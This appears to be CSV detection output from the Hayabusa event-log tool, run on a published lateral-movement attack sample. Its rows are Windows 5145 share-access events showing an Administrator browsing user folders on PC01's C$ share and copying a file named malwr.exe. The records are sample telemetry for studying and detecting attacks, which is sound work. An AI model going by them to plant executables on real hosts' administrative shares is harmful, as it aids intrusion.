+2019-03-18 23:23:25.629 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.629 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Music\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.629 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Pictures\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.629 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Saved Games\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.639 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Searches\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.639 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Videos\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.639 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Contacts | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.639 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Desktop | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.639 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Documents | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.639 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Downloads | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.649 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Favorites | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.649 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Favorites\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.649 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Favorites\Links for United States\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.649 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Favorites\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.649 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Favorites\Links for United States | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.659 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.659 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Music | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.659 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Pictures | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.659 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Saved Games | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.659 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Searches | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.659 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Videos | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.659 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04 | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.669 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Contacts\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.669 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Desktop\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.669 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Documents\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.669 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Downloads\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.669 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Favorites\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.679 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.679 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Music\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.679 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Pictures\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.679 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Saved Games\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.679 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Searches\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.679 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Videos\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.689 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Contacts | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.689 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Desktop | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.689 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Documents | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.689 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Downloads | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.689 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Favorites | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.689 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Favorites\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.699 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Favorites\Links for United States\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.699 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Favorites\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.699 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Favorites\Links for United States | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.709 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.709 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Music | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.709 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Pictures | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.709 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Saved Games | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.709 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Searches | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.709 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user04\Videos | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:26.981 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: malwr.exe | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:26.981 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: malwr.exe | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:27.061 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: malwr.exe | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:27.071 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: malwr.exe | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:27.081 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ui\SwDRM.dll | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:27.081 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: malwr.exe | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:45.488 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:45.548 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:45.548 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:47.721 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01 | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:47.721 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01 | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:56.403 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:56.414 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\AppData | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:58.386 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01 | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:24:04.105 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
